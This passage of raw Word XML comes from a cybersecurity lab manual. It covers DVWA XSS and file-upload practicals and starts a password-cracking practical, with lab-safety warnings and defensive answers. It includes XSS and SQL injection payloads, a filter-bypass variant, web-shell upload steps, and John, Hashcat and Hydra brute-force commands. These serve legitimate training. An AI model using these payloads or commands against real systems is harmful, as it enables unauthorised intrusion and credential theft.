          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q2. How would a parameterised query prevent SQL injection?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A parameterised query sends the SQL structure and the user-supplied value through two separate channels to the database, so the value is always treated as literal data, never as SQL syntax. An injected value like </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">' OR '1'='1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> would simply be searched for literally (matching nothing) instead of altering the query's logic.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 6 — Web App Testing: XSS and File Upload on DVWA (Est. 4 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Demonstrate Reflected XSS, Stored XSS, and file upload vulnerabilities on DVWA at Low and Medium security levels.</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2144"/>
        <w:gridCol w:w="7602"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Kali Linux; DVWA; Burp Suite Community</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Burp Suite, Firefox DevTools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On Low security, open Reflected XSS, submit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('XSS')&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and screenshot the resulting alert box.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to Medium; observe the basic filter; try a case-variation bypass such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;ScRiPt&gt;alert('XSS')&lt;/ScRiPt&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and screenshot the result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Stored XSS (Low), post a script payload as a guestbook entry, then reload the page as a fresh session and screenshot it firing automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Open File Upload (Low); prepare a minimal PHP web shell file (lab use only); upload it and note the storage path shown by DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browse directly to the uploaded file's URL and confirm command execution through it; screenshot the result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to Medium; attempt the same upload and observe the extension filtering; document what (if anything) bypasses it in your lab version, without performing the bypass against anything outside the lab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:left w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:bottom w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:right w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FBEAEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A33A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⛔ Lab Safety — Authorised Lab Only</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Delete any uploaded web shell from the DVWA environment at the end of the practical, and never reuse this file outside the isolated lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation Questions — Answered</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q1. What is Content Security Policy (CSP) and how does it defend against XSS?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">CSP is an HTTP response header that tells the browser which sources of scripts and other content it is allowed to execute — for example restricting scripts to the site's own origin and disallowing inline </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> blocks. Even if an attacker successfully injects a script via an XSS flaw, a correctly configured CSP will stop the browser from executing it, because the policy disallows that script's source/form — a strong defence-in-depth layer on top of output encoding.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Q2. The file upload vulnerability allowed a PHP webshell. List 3 server-side controls that would have prevented this.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">1) Validate the uploaded file's true type by content/signature, not by extension or client-supplied MIME type. 2) Store uploads outside the web root, or rename them with no executable extension. 3) Configure the web server so files in the uploads directory are never executed as scripts, regardless of extension.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Practical 7 — Password Cracking and Hydra Brute Force (Est. 4 hrs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Crack password hashes using John the Ripper and Hashcat; perform online brute force against DVWA login with Hydra.</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2144"/>
        <w:gridCol w:w="7602"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2144"/>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Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760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Kali Linux; Metasploitable 2; DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7602"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">john</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">hashcat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">hydra</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">/usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Save the MD5 hashes extracted in Practical 5 into a text file, one per line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Decompress the wordlist if needed: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">gunzip /usr/share/wordlists/rockyou.txt.gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run John: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">john --show hashes.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the equivalent Hashcat attack: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and screenshot the session.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run Hydra against SSH on Metasploitable 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://&lt;target-ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
